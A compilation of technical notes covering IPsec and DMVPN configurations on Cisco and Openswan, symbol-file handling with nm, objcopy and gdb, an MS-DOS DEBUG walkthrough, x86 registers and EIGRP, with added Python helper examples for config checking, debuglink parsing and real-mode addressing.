ROUTER-3(config-if)# tunnel protection ipsec profile PROFILE

Troubleshooting commands

Router# show ip nhrp
Router# show dmvpn
Router# show crypto isakmp sa
Router# show crypto ipsec sa

# Site-to-site IPsec VPN configurations

Topology

[PC-1]----[VPN_DEVICE-1]----[VPN_DEVICE-2]----[PC-2]

[VPN_DEVICE-1] can be a Cisco ASA (ASA-1), a Cisco router (ROUTER-1) or an Openswan server (LINUX-1).
[VPN_DEVICE-2] can be a Cisco ASA (ASA-2), a Cisco router (ROUTER-2) or an Openswan server (LINUX-2).

[PC-1] eth0: 192.168.1.1/24

[VPN_DEVICE-1]
(ASA-1) e0/1, (ROUTER-1) fa0/1, (LINUX-1) fa0/1: 192.168.1.254/24
(ASA-1) e0/0, (ROUTER-1) fa0/0, (LINUX-1) fa0/0: 12.12.12.1/24

[VPN_DEVICE-2]
(ASA-2) e0/0, (ROUTER-2) fa0/0, (LINUX-2) fa0/0: 12.12.12.2/24
(ASA-2) e0/1, (ROUTER-2) fa0/1, (LINUX-2) fa0/1: 192.168.2.254/24

[PC-2] eth0: 192.168.2.1/24

Between two ASAs

ASA-1(config)# crypto ikev1 policy 1 ! crypto isakmp
ASA-1(config-ikev1-policy)# authentication pre-share
ASA-1(config-ikev1-policy)# encryption aes
ASA-1(config-ikev1-policy)# hash sha
ASA-1(config-ikev1-policy)# group 2
ASA-1(config-ikev1-policy)# lifetime 86400
ASA-1(config)# crypto ikev1 am-disable
ASA-1(config)# crypto ikev1 enable outside ! crypto isakmp
ASA-1(config)# tunnel-group 12.12.12.2 type ipsec-l2l
ASA-1(config)# tunnel-group 12.12.12.2 ipsec-attributes
ASA-1(config-tunnel-ipsec)# pre-shared-key SECRET_KEY
ASA-1(config)# access-list CRYPTO_ACL permit ip 192.168.1.0 255.255.255.0 192.168.2.0 255.255.255.0
ASA-1(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ASA-1(config)# crypto map CRYPTO_MAP 1 set peer 12.12.12.2
ASA-1(config)# crypto map CRYPTO_MAP 1 match address CRYPTO_ACL
ASA-1(config)# crypto map CRYPTO_MAP 1 set transform-set TRANSFORM_SET
ASA-1(config)# crypto map CRYPTO_MAP 1 set pfs group2
ASA-1(config)# crypto map CRYPTO_MAP interface outside
ASA-1(config)# route outside 192.168.2.0 255.255.255.0 12.12.12.2
ASA-1(config)# object network INSIDE_NET
ASA-1(config-network-object)# subnet 192.168.1.0 255.255.255.0
ASA-1(config)# object network OUTSIDE_NET
ASA-1(config-network-object)# subnet 192.168.2.0 255.255.255.0
ASA-1(config)# nat (inside,outside) source static INSIDE_NET INSIDE_NET destination static OUTSIDE_NET OUTSIDE_NET
ASA-1(config)# sysopt connection permit-vpn ! permit-ipsec or use an outside ACL
ASA-2(config)# crypto ikev1 policy 1 ! crypto isakmp
ASA-2(config-ikev1-policy)# authentication pre-share
ASA-2(config-ikev1-policy)# encryption aes
ASA-2(config-ikev1-policy)# hash sha
ASA-2(config-ikev1-policy)# group 2
ASA-2(config-ikev1-policy)# lifetime 86400
ASA-2(config)# crypto ikev1 am-disable
ASA-2(config)# crypto ikev1 enable outside ! crypto isakmp
ASA-2(config)# tunnel-group 12.12.12.1 type ipsec-l2l
ASA-2(config)# tunnel-group 12.12.12.1 ipsec-attributes
ASA-2(config-tunnel-ipsec)# pre-shared-key SECRET_KEY
ASA-2(config)# access-list CRYPTO_ACL permit ip 192.168.2.0 255.255.255.0 192.168.1.0 255.255.255.0
ASA-2(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ASA-2(config)# crypto map CRYPTO_MAP 1 set peer 12.12.12.1
ASA-2(config)# crypto map CRYPTO_MAP 1 match address CRYPTO_ACL
ASA-2(config)# crypto map CRYPTO_MAP 1 set transform-set TRANSFORM_SET
ASA-2(config)# crypto map CRYPTO_MAP 1 set pfs group2
ASA-2(config)# crypto map CRYPTO_MAP interface outside
ASA-2(config)# route outside 192.168.1.0 255.255.255.0 12.12.12.1
ASA-2(config)# object network INSIDE_NET
ASA-2(config-network-object)# subnet 192.168.2.0 255.255.255.0
ASA-2(config)# object network OUTSIDE_NET
ASA-2(config-network-object)# subnet 192.168.1.0 255.255.255.0
ASA-2(config)# nat (inside,outside) source static INSIDE_NET INSIDE_NET destination static OUTSIDE_NET OUTSIDE_NET
ASA-2(config)# sysopt connection permit-vpn ! permit-ipsec or use an outside ACL

Between two IOS routers

ROUTER-1(config)# crypto isakmp policy 1
ROUTER-1(config-isakmp)# authentication pre-share
ROUTER-1(config-isakmp)# encryption aes
ROUTER-1(config-isakmp)# hash sha
ROUTER-1(config-isakmp)# group 2
ROUTER-1(config-isakmp)# lifetime 86400
ROUTER-1(config)# crypto isakmp aggressive-mode disable
ROUTER-1(config)# crypto isakmp key 0 SECRET_KEY address 12.12.12.2
ROUTER-1(config)# crypto isakmp enable
ROUTER-1(config)# ip access-list extended CRYPTO_ACL
ROUTER-1(config-ext-nacl)# permit ip 192.168.1.0 0.0.0.255 192.168.2.0 0.0.0.255
ROUTER-1(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-1(config)# crypto map CRYPTO_MAP 1 ipsec-isakmp
ROUTER-1(config-crypto-map)# set peer 12.12.12.2
ROUTER-1(config-crypto-map)# match address CRYPTO_ACL
ROUTER-1(config-crypto-map)# set transform-set TRANSFORM_SET
ROUTER-1(config-crypto-map)# set pfs group2
ROUTER-1(config)# interface fa0/0
ROUTER-1(config-if)# crypto map CRYPTO_MAP
ROUTER-1(config-if)# ip nat outside
ROUTER-1(config)# interface fa0/1
ROUTER-1(config-if)# ip nat inside
ROUTER-1(config)# ip route 192.168.2.0 255.255.255.0 12.12.12.2
ROUTER-1(config)# ip access-list extended ACL_NONAT
ROUTER-1(config-ext-nacl)# deny ip 192.168.1.0 0.0.0.255 192.168.2.0 0.0.0.255
ROUTER-1(config-ext-nacl)# permit ip any any
ROUTER-1(config)# ip nat inside source list ACL_NONAT interface fa0/0 overload
ROUTER-2(config)# crypto isakmp policy 1
ROUTER-2(config-isakmp)# authentication pre-share
ROUTER-2(config-isakmp)# encryption aes
ROUTER-2(config-isakmp)# hash sha
ROUTER-2(config-isakmp)# group 2
ROUTER-2(config-isakmp)# lifetime 86400
ROUTER-2(config)# crypto isakmp aggressive-mode disable
ROUTER-2(config)# crypto isakmp key 0 SECRET_KEY address 12.12.12.1
ROUTER-2(config)# crypto isakmp enable
ROUTER-2(config)# ip access-list extended CRYPTO_ACL
ROUTER-2(config-ext-nacl)# permit ip 192.168.2.0 0.0.0.255 192.168.1.0 0.0.0.255
ROUTER-2(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-2(config)# crypto map CRYPTO_MAP 1 ipsec-isakmp
ROUTER-2(config-crypto-map)# set peer 12.12.12.1
ROUTER-2(config-crypto-map)# match address CRYPTO_ACL
ROUTER-2(config-crypto-map)# set transform-set TRANSFORM_SET
ROUTER-2(config-crypto-map)# set pfs group2
ROUTER-2(config)# interface fa0/0
ROUTER-2(config-if)# crypto map CRYPTO_MAP
ROUTER-2(config-if)# ip nat outside
ROUTER-2(config)# interface fa0/1
ROUTER-2(config-if)# ip nat inside
ROUTER-2(config)# ip route 192.168.1.0 255.255.255.0 12.12.12.1
ROUTER-2(config)# ip access-list extended ACL_NONAT
ROUTER-2(config-ext-nacl)# deny ip 192.168.2.0 0.0.0.255 192.168.1.0 0.0.0.255
ROUTER-2(config-ext-nacl)# permit ip any any
ROUTER-2(config)# ip nat inside source list ACL_NONAT interface fa0/0 overload
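Every IOS and ASA configuration on this page (VTI, GRE over IPsec, crypto maps, DMVPN and the site-to-site pairs) repeats the same IKEv1 policy, and the tunnel only comes up when both peers agree on it. The checker below, an added example that is not part of the original page or Cisco's tooling, reads the prompt-plus-command transcript form used above, reports phase 1 / phase 2 mismatches between two peers and flags the settings a reviewer would question (DH group 2, SHA-1, aggressive mode left enabled, a 0.0.0.0 wildcard pre-shared key). SAMPLE is constructed from the page's hub/spoke policy with two deliberate deviations on ROUTER-2; the Openswan ipsec.conf format is not handled.

```python
"""Consistency and strength check for the IKEv1/IPsec peer settings above.
Added example, not from the original page or from Cisco; it reads the
prompt-plus-command transcript form of the IOS and ASA sections (not the
Openswan ipsec.conf). SAMPLE is constructed: the page's hub/spoke policy
with two deliberate deviations on ROUTER-2 (hash sha256, aggressive mode
left enabled) so that the checks have something to report.
"""
import re
from typing import Dict, List

PROMPT = re.compile(r"^(?P<host>[\w-]+)\((?P<mode>[^)]*)\)#\s*(?P<cmd>.+?)\s*$")
POLICY_MODES = {"config-isakmp", "config-ikev1-policy"}   # IOS and ASA prompts
PHASE1_KEYS = ("authentication", "encryption", "hash", "group", "lifetime")
# Both sides must agree on these; a lifetime mismatch just yields the shorter one.
STRICT_KEYS = ("authentication", "encryption", "hash", "group")
# Settings this example flags (its own list, not a vendor default).
WEAK = {
    ("group", "1"): "DH group 1 (768-bit MODP) is broken",
    ("group", "2"): "DH group 2 (1024-bit MODP) is below current guidance",
    ("hash", "md5"): "MD5 integrity is deprecated",
    ("hash", "sha"): "SHA-1 integrity is deprecated; prefer sha256 or stronger",
    ("encryption", "3des"): "3DES is deprecated",
}


def parse_transcript(text: str) -> Dict[str, dict]:
    """Collect per-hostname IKE/IPsec settings from a CLI transcript."""
    hosts: Dict[str, dict] = {}
    for line in text.splitlines():
        m = PROMPT.match(line.strip())
        if not m:
            continue                          # output or continuation line
        host, mode, cmd = m.group("host"), m.group("mode"), m.group("cmd")
        h = hosts.setdefault(host, {"phase1": {}, "aggressive_disabled": False,
                                    "transform": None, "pfs": None, "wildcard_psk": False})
        words = cmd.split()
        if mode in POLICY_MODES and words[0] in PHASE1_KEYS:
            h["phase1"][words[0]] = " ".join(words[1:])
        elif cmd in ("crypto isakmp aggressive-mode disable", "crypto ikev1 am-disable"):
            h["aggressive_disabled"] = True
        elif words[:3] == ["crypto", "ipsec", "transform-set"]:
            h["transform"] = tuple(words[4:])  # words[3] is the set's name
        elif "set" in words and "pfs" in words:
            h["pfs"] = words[words.index("pfs") + 1]
        elif "key" in words and "0.0.0.0 0.0.0.0" in cmd:
            h["wildcard_psk"] = True           # the PSK is accepted from any peer
    return hosts


def compare_peers(a: dict, b: dict) -> List[str]:
    """Mismatches that stop the two sides from negotiating a tunnel."""
    problems = []
    for k in STRICT_KEYS:
        if a["phase1"].get(k) != b["phase1"].get(k):
            problems.append(f"phase1 {k}: {a['phase1'].get(k)!r} != {b['phase1'].get(k)!r}")
    if a["transform"] != b["transform"]:
        problems.append(f"transform-set: {a['transform']} != {b['transform']}")
    if a["pfs"] != b["pfs"]:
        problems.append(f"pfs: {a['pfs']} != {b['pfs']}")
    return problems


def weak_settings(h: dict) -> List[str]:
    """Findings worth raising even when the tunnel comes up fine."""
    notes = [msg for (k, v), msg in WEAK.items() if h["phase1"].get(k) == v]
    if not h["aggressive_disabled"]:
        notes.append("aggressive mode not disabled (PSK-derived hash sent in the clear)")
    if h["wildcard_psk"]:
        notes.append("wildcard 0.0.0.0 PSK: any host knowing the key can bring up a tunnel")
    return notes


def check(text: str, left: str, right: str) -> dict:
    hosts = parse_transcript(text)
    return {"mismatches": compare_peers(hosts[left], hosts[right]),
            left: weak_settings(hosts[left]), right: weak_settings(hosts[right])}


SAMPLE = """\
ROUTER-1(config-isakmp)# authentication pre-share
ROUTER-1(config-isakmp)# encryption aes
ROUTER-1(config-isakmp)# hash sha
ROUTER-1(config-isakmp)# group 2
ROUTER-1(config)# crypto isakmp aggressive-mode disable
ROUTER-1(config)# crypto isakmp key 0 SECRET_KEY address 0.0.0.0 0.0.0.0
ROUTER-1(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-1(config-crypto-map)# set pfs group2
ROUTER-2(config-isakmp)# authentication pre-share
ROUTER-2(config-isakmp)# encryption aes
ROUTER-2(config-isakmp)# hash sha256
ROUTER-2(config-isakmp)# group 2
ROUTER-2(config)# crypto isakmp key 0 SECRET_KEY address 12.12.12.1
ROUTER-2(config)# crypto ipsec transform-set TRANSFORM_SET esp-aes esp-sha-hmac
ROUTER-2(config-crypto-map)# set pfs group2
"""
```

Run `check(open("transcript.txt").read(), "ROUTER-1", "ROUTER-2")` on a captured session to get the same three lists for real peers.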

Between two Openswan servers

LINUX-1# route add default gw 12.12.12.2
LINUX-1# echo 1 > /proc/sys/net/ipv4/ip_forward
LINUX-1# iptables -t nat -I POSTROUTING -s 192.168.1.0/24 -d 192.168.2.0/24 -j ACCEPT
LINUX-1# iptables -t nat -A POSTROUTING -s 192.168.1.0/24 -j SNAT --to 12.12.12.1 -o eth0
LINUX-1# cat /etc/ipsec.conf
version 2.0
config setup
 dumpdir=/var/run/pluto/
 nat_traversal=no
 oe=off
 protostack=netkey
conn LINUX-2
 type=tunnel
 left=12.12.12.1
 leftsubnet=192.168.1.0/24
 right=12.12.12.2
 rightsubnet=192.168.2.0/24
 authby=secret
 pfs=yes
 aggrmode=no
 ike="aes128-sha1-modp1024"
 phase2alg="aes128-sha1;modp1024"
 auto=start
LINUX-1# cat /var/lib/openswan/ipsec.secrets.inc 
12.12.12.1 12.12.12.2 : PSK "SECRET_KEY"
LINUX-1# service ipsec start
LINUX-2# route add default gw 12.12.12.1
LINUX-2# echo 1 > /proc/sys/net/ipv4/ip_forward
LINUX-2# iptables -t nat -I POSTROUTING -s 192.168.2.0/24 -d 192.168.1.0/24 -j ACCEPT
LINUX-2# iptables -t nat -A POSTROUTING -s 192.168.2.0/24 -j SNAT --to 12.12.12.2 -o eth0
LINUX-2# cat /etc/ipsec.conf
version 2.0
config setup
 dumpdir=/var/run/pluto/
 nat_traversal=no
 oe=off
 protostack=netkey
conn LINUX-1
 left=12.12.12.1
 leftsubnet=192.168.1.0/24
 right=12.12.12.2
 rightsubnet=192.168.2.0/24
 authby=secret
 pfs=yes
 aggrmode=no
 ike="aes128-sha1-modp1024"
 phase2alg="aes128-sha1;modp1024"
 auto=start
LINUX-2# cat /var/lib/openswan/ipsec.secrets.inc 
12.12.12.1 12.12.12.2 : PSK "SECRET_KEY"
LINUX-2# service ipsec start

# Working with symbols files


What is a symbols file?

A file containing a table of a program's identifiers (symbols) together with information about their declaration and their location in the binary.


Compiling with or without debugging information for GDB

# gcc -o example_debug -ggdb example.c
# gcc -o example_nodebug example.c

Listing the symbols of an object file

# nm example_debug

Three columns: Virtual_address | Symbol_type | Symbol_name
Lowercase symbol types are local and uppercase ones are global (external).

Copying debug symbols to an external file

# objcopy --only-keep-debug example_debug example.dbg

Stripping the debug symbols added with -ggdb

# objcopy --strip-debug example_debug

Stripping all unneeded symbol information

# objcopy --strip-debug --strip-unneeded example_debug

Adding debug symbols to a binary

# gdb example_nodebug
(gdb) symbol-file example.dbg

or

# objcopy --add-gnu-debuglink=example.dbg example_nodebug
# gdb example_nodebug

Debugging a core file

# gdb example corefile
(gdb) symbol-file example.dbg
(gdb) bt
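Two things in the procedure above are worth seeing in code: what the nm columns mean and how `--add-gnu-debuglink` ties the stripped binary to its `.dbg` file. The block below is an added example (mine, not part of the original notes or of binutils). It parses a constructed nm listing using the case rule above, then builds the `.gnu_debuglink` payload the way objcopy lays it out (base name, NUL terminator, zero padding to a 4-byte boundary, CRC-32 of the debug file, little-endian on x86) and verifies a candidate debug file against it, which is the check GDB performs before it accepts a linked debug file. The nm lines and the debug-file bytes are constructed samples, not captured from the binaries above.

```python
"""nm output parsing and .gnu_debuglink construction/verification.

Added example, not part of the original notes.  NM_OUTPUT is a
constructed sample of `nm example_debug` output.
"""
import struct
import zlib

NM_OUTPUT = """\
0000000000004010 B completed.0
0000000000001040 t deregister_tm_clones
0000000000001139 T main
                 U printf@GLIBC_2.2.5
0000000000004000 D some_global
0000000000004008 d static_counter
                 w __gmon_start__
"""


def parse_nm(text):
    """Return a list of (address or None, type letter, name) tuples."""
    symbols = []
    for line in text.splitlines():
        fields = line.split()
        if not fields:
            continue
        if len(fields) == 2:          # undefined or weak-undefined: nm prints no address
            symbols.append((None, fields[0], fields[1]))
        else:
            symbols.append((int(fields[0], 16), fields[1], fields[2]))
    return symbols


def classify(symbols):
    """Group symbol names by scope using the lowercase/uppercase rule from the notes."""
    groups = {"local": [], "global": [], "undefined": []}
    for addr, stype, name in symbols:
        if addr is None:
            groups["undefined"].append(name)
        elif stype.islower():
            groups["local"].append(name)
        else:
            groups["global"].append(name)
    return groups


def build_debuglink(debug_path, debug_file_bytes):
    """Return the bytes objcopy writes into the .gnu_debuglink section."""
    name = debug_path.rsplit("/", 1)[-1].encode() + b"\0"   # base name only, NUL-terminated
    name += b"\0" * (-len(name) % 4)                          # pad to a 4-byte boundary
    crc = zlib.crc32(debug_file_bytes) & 0xFFFFFFFF           # the CRC-32 GDB recomputes
    return name + struct.pack("<I", crc)


def parse_debuglink(section):
    """Split a .gnu_debuglink section into (debug file name, stored CRC-32)."""
    name = section[:section.index(b"\0")].decode()
    (crc,) = struct.unpack("<I", section[-4:])
    return name, crc


def verify_debuglink(section, debug_file_bytes):
    """True when the candidate debug file matches the CRC recorded in the binary."""
    _, expected = parse_debuglink(section)
    return (zlib.crc32(debug_file_bytes) & 0xFFFFFFFF) == expected


if __name__ == "__main__":
    print(classify(parse_nm(NM_OUTPUT)))
    sample = b"constructed debug file contents"
    link = build_debuglink("/tmp/build/example.dbg", sample)
    print(parse_debuglink(link), verify_debuglink(link, sample))
```

A mismatch from `verify_debuglink` is the same condition under which gdb ignores the `.dbg` file, so a one-byte change to the debug file after `--add-gnu-debuglink` ran is enough to lose the symbols again.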

# MS-DOS debug

C:\> type CharColor.asm
segment DATA
        Asterisk db '*'
        Color    db 0f0h ; white background and black foreground
        Position dw 3280 ; 20x160b + 80*2b (line 20, col 40)

segment STACK stack
        resb 256
        StackPointer:

segment CODE
        ..start:

        mov ax, STACK
        mov ss, ax
        mov sp, StackPointer

        mov ax, DATA
        mov ds, ax
        mov ax, 0b800h
        mov es, ax
        mov al, [Asterisk]
        mov ah, [Color]
        mov bx, [Position]
        mov [es:bx], ax
        mov word [es:5*160+35*2], 00a41h

        mov ah, 4ch
        int 21h
C:\> nasm   CharColor.asm -f obj
C:\> alink  CharColor.obj -o CharColor.exe
C:\> dir /x CharColor.exe
C:\> debug  CHARCO~1.EXE
-?
assemble     A [dirección]
compare      C intervalo de direcciones
dump         D [intervalo]
enter        E dirección [lista]
fill         F lista de rango
go           G [=dirección] [direcciones]
hex          H valor1 valor2
input        I puerto
load         L [dirección] [unidad] [primer sector] [número]
move         M intervalo de direcciones
name         N [ruta] [lista de argumentos]
output       O byte de puerto
proceed      P [=dirección] [número]
quit         Q
register     R [registro]
search       S lista de rango
trace        T [=dirección] [valor]
unassemble   U [intervalo]
write        W [dirección] [unidad] [primer sector] [número]
allocate expanded memory        XA [N.páginas]
deallocate expanded memory      XD [identificador]
map expanded memory pages       XM [páginaL] [páginaP] [identificador]
display expanded memory status  XS
-

Unassemble

-u 0 29
158A:0000 B87A15        MOV     AX,157A
158A:0003 8ED0          MOV     SS,AX
158A:0005 BC0001        MOV     SP,0100
158A:0008 B87915        MOV     AX,1579
158A:000B 8ED8          MOV     DS,AX
158A:000D B800B8        MOV     AX,B800
158A:0010 8EC0          MOV     ES,AX
158A:0012 A00000        MOV     AL,[0000]
158A:0015 8A260100      MOV     AH,[0001]
158A:0019 8B1E0200      MOV     BX,[0002]
158A:001D 26            ES:
158A:001E 8907          MOV     [BX],AX
158A:0020 26            ES:
158A:0021 C7066603410A  MOV     WORD PTR [0366],0A41
158A:0027 B44C          MOV     AH,4C
158A:0029 CD21          INT     21

Dump

-d 1579:0
1579:0000  2A F0 D0 0C 00 00 00 00-00 00 00 00 00 00 00 00   *...............
1579:0010  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   ................
1579:0020  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   ................
1579:0030  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   ................
1579:0040  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   ................
1579:0050  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   ................
1579:0060  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   ................
1579:0070  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   ................

Register Status

-r
AX=0000  BX=FFFF  CX=FF8B  DX=0000  SP=0100  BP=0000  SI=0000  DI=0000
DS=1569  ES=1569  SS=157A  CS=158A  IP=0000   NV UP EI PL NZ NA PO NC
158A:0000 B87A15        MOV     AX,157A

Go and modify a register

-g 19
AX=F02A  BX=FFFF  CX=FF8B  DX=0000  SP=0100  BP=0000  SI=0000  DI=0000
DS=1579  ES=B800  SS=157A  CS=158A  IP=0019   NV UP EI PL NZ NA PO NC
158A:0019 8B1E0200      MOV     BX,[0002]                          DS:0002=0CD0
-r ax
AX F02A
:f041

Proceed next program instruction

-g 27
AX=F02A  BX=0CD0  CX=FF8B  DX=0000  SP=0100  BP=0000  SI=0000  DI=0000
DS=1579  ES=B800  SS=157A  CS=158A  IP=0027   NV UP EI PL NZ NA PO NC
158A:0027 B44C          MOV     AH,4C
-p
AX=4C2A  BX=0CD0  CX=FF8B  DX=0000  SP=0100  BP=0000  SI=0000  DI=0000
DS=1579  ES=B800  SS=157A  CS=158A  IP=0029   NV UP EI PL NZ NA PO NC
158A:0029 CD21          INT     21
-p

El programa ha terminado de forma normal

Trace next instruction

-g 27
AX=F02A  BX=0CD0  CX=FF8B  DX=0000  SP=0100  BP=0000  SI=0000  DI=0000
DS=1579  ES=B800  SS=157A  CS=158A  IP=0027   NV UP EI PL NZ NA PO NC
158A:0027 B44C          MOV     AH,4C
-t
AX=4C2A  BX=0CD0  CX=FF8B  DX=0000  SP=0100  BP=0000  SI=0000  DI=0000
DS=1579  ES=B800  SS=157A  CS=158A  IP=0029   NV UP EI PL NZ NA PO NC
158A:0029 CD21          INT     21
-t
AX=4C2A  BX=0CD0  CX=FF8B  DX=0000  SP=00FA  BP=0000  SI=0000  DI=0000
DS=1579  ES=B800  SS=157A  CS=00A7  IP=107C   NV UP DI PL NZ NA PO NC
00A7:107C 90            NOP

Enter (memory modification)

-g 0d
AX=1579  BX=FFFF  CX=FF8B  DX=0000  SP=0100  BP=0000  SI=0000  DI=0000
DS=1579  ES=1569  SS=157A  CS=158A  IP=000D   NV UP EI PL NZ NA PO NC
158A:000D B800B8        MOV     AX,B800
-d ds:0
1579:0000  2A F0 D0 0C 00 00 00 00-00 00 00 00 00 00 00 00   *...............
1579:0010  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   ................
1579:0020  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   ................
1579:0030  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   ................
1579:0040  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   ................
1579:0050  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   ................
1579:0060  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   ................
1579:0070  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   ................
-e ds:0 'A'
-e b800:0 'h' f0 'e' 0f 'l' f0 'l' 0f 'o' f0


Assemble new instructions (code modification)

-a 20
158A:0020 inc bx
158A:0021 inc bx
158A:0022 es:
158A:0023 mov [bx], ax
158A:0025 mov ah, 4c
158A:0027 int 21
158A:0029

# NASM Hello world

C:\> type HelloDOS.asm
segment DATA
        Greeting db 'Hello DOS!$'

segment STACK stack
        resb 256
        StackPointer:

segment CODE
        ..start:

        mov ax, STACK
        mov ss, ax
        mov sp, StackPointer

        mov ax, DATA
        mov ds, ax
        mov dx, Greeting
        mov ah, 9
        int 21h

        mov ah, 4ch
        int 21h
C:\> nasm  HelloDOS.asm -f obj
C:\> alink HelloDOS.obj -o HelloDOS.exe
C:\> HelloDOS.exe

# x86 architecture

Registers

CS: Code Segment
IP: Instruction Pointer (EIP/RIP)
DS: Data Segment
AX: Accumulator (AL/AH/./EAX/RAX)
BX: Base (BL/BH/./EBX/RBX)
CX: Counter (CL/CH/./ECX/RCX)
DX: Data (DL/DH/./EDX/RDX)
SI: Source Index (SIL/./ESI/RSI)
DI: Destination Index (DIL/./EDI/RDI)
R8: (R8B/R8W/R8D/.)
R9: (R9B/R9W/R9D/.)
R10: (R10B/R10W/R10D/.)
R11: (R11B/R11W/R11D/.)
R12: (R12B/R12W/R12D/.)
R13: (R13B/R13W/R13D/.)
R14: (R14B/R14W/R14D/.)
R15: (R15B/R15W/R15D/.)
ES: Extra Segment (Data)
FS: Extra Segment (Data)
GS: Extra Segment (Data)
SS: Stack Segment
BP: Base Pointer (BPL/./EBP/RBP)
SP: Stack Pointer (SPL/./ESP/RSP)

Operating modes

Real mode

- 16-bit registers
- 1MB of memory can be addressed (16-bit --> 20-bit)
- Sub-modes: plain (CS=DS=SS=64KB) or segmented (CS=SS=64KB and multiple data segments of 64 KB)
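The "16-bit --> 20-bit" item is easiest to see with the DEBUG output from the CharColor session above. The block below is an added example (my code, not from the notes): it parses a DEBUG register line, converts segment:offset pairs into the 20-bit linear address real mode puts on the bus (including the wrap at 1 MB), and decodes the offsets CharColor.asm writes into the 0B800h text buffer into (row, column) plus a CGA attribute byte. REG_LINE is copied from the `-g 19` dump on this page; the helper names and the attribute-byte split (low nibble foreground, bits 4-6 background, bit 7 blink) are standard but the functions are mine.

```python
"""Real-mode address arithmetic on the DEBUG output above.

Added example, not part of the original notes.
"""
import re

# Second register line printed by DEBUG after `-g 19` (copied from the page).
REG_LINE = "DS=1579  ES=B800  SS=157A  CS=158A  IP=0019   NV UP EI PL NZ NA PO NC"

VIDEO_SEGMENT = 0xB800     # colour text-mode buffer the program loads into ES
BYTES_PER_ROW = 80 * 2     # 80 cells per row, each a (character, attribute) pair


def parse_registers(line):
    """Map the NAME=HEX tokens of a DEBUG register line to integers; flag bits are skipped."""
    return {name: int(value, 16)
            for name, value in re.findall(r"\b([A-Z]{2})=([0-9A-F]{4})\b", line)}


def linear_address(segment, offset):
    """Real-mode physical address: (segment << 4) + offset, wrapped at the 1 MB limit."""
    return ((segment << 4) + offset) & 0xFFFFF


def cell_from_offset(offset):
    """Convert a byte offset in the text buffer into (row, column)."""
    if offset % 2:
        raise ValueError("character cells start on even offsets")
    row, rem = divmod(offset, BYTES_PER_ROW)
    return row, rem // 2


def offset_from_cell(row, col):
    """Inverse of cell_from_offset: the byte offset of a screen cell."""
    return row * BYTES_PER_ROW + col * 2


def cell_word(word):
    """Split the 16-bit value stored per cell into (character, attribute byte)."""
    return chr(word & 0xFF), word >> 8


def decode_attribute(attr):
    """Split a CGA attribute byte into (foreground 0-15, background 0-7, blink flag)."""
    return attr & 0x0F, (attr >> 4) & 0x07, bool(attr & 0x80)


if __name__ == "__main__":
    regs = parse_registers(REG_LINE)
    print(hex(linear_address(regs["DS"], 2)))                 # where DS:0002 (Position) lives
    print(cell_from_offset(0x0CD0), cell_word(0xF02A))         # the asterisk cell and its word
```

With the page's values: DS:0002 is linear 15792h, the asterisk at ES:0CD0h lands at B8CD0h, which is row 20, column 40, and the `mov word [es:5*160+35*2], 00a41h` store (offset 0366h) is row 5, column 35 holding 'A' with attribute 0Ah.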

Protected mode

- 32-bit registers
- 4GB of memory can be addressed
- Boot process: real mode --> protected mode (backward compatibility)
- Plain memory (no segments --> descriptors)
- Sub-mode: virtual 8086 (run real mode programs under a protected mode supervisor OS).

Long mode

- 64-bit registers
- 16EB of memory can be addressed
- Plain memory (no segments)

# EIGRP

EIGRP Basics and Steady-State Operation

- Transport: IP protocol 88 (does not use UDP or TCP)
- Metric: bandwidth + delay (by default) and load + reliability + MTU (optionally)
- Hello interval
- Hold timer
- Update destination: 224.0.0.10
- Full updates: when neighbors are discovered
- Partial updates: otherwise
- Authentication: only MD5
- VLSM: supported
- Route tags: routes redistributed into EIGRP
- Next-hop field: advertisement of routes with a different next-hop router
- Manual summarization
- Multiprotocol: IP, IPX and AppleTalk

Hellos, Neighbors, and Adjacencies

Two EIGRP neighbors become adjacent when they:

- Pass the authentication process
- Use the same AS number
- Believe that the source IP of a received Hello is in the same subnet
- Have matching K values (metric weights tos k1 k2 k3 k4 k5)

Hello and hold time parameters do not need to match for an EIGRP neighbor relationship to form. When monitoring a neighbor relationship, a router uses each neighbor's stated timers.

EIGRP Updates

Sequence:

- Initially full updates are sent.
- Subsequent partial updates occur when one or more routes change.
- If a neighbor fails and recovers, or a new adjacency is formed, full updates are sent.

EIGRP uses RTP (Reliable Transport Protocol) to send multicast updates, waiting on a unicast EIGRP ACK from each neighbor.
If a neighbor fails to acknowledge the update then RTP resends a unicast update.
An SRTT (Smoothed Round-Trip Time) is calculated for each neighbor, and an RTO (Retransmission TimeOut) is derived from each SRTT. Both values are shown in the show ip eigrp neighbors output. If the RTO expires before the acknowledgement is received, a unicast update is sent.
RTP uses a window size of one message, and each message carries a sequence number that its acknowledgement references.

The EIGRP Topology Table

EIGRP uses three tables: the neighbor table, the topology table and the IP routing table.
The bandwidth and delay interface (or subinterface) commands manually override the default values EIGRP uses in its metric.
The neighbor's metric for a route is called the reported distance (RD).
The feasible distance (FD) is the router's best calculated metric among all possible routes for a particular prefix.
The route with the FD is called the successor route (placed in the IP routing table).

EIGRP Convergence

- Reported distance (RD): metric reported by a neighbor router
- Feasible distance (FD): lowest metric to reach a particular subnet
- Feasibility condition (FC): when multiple routes exist, the case in which an RD is lower than the FD
- Successor route (SR): the route with the FD
- Feasible successor (FS): a route that is not the SR but meets the FC.

Input Events and Local Computation

EIGRP sends updates only as a result of changed or new topology information.
For a failed route:

- If an FS route exists, install the lowest-metric FS route and send updates to neighbors.
- If no FS route exists, query the neighbors.

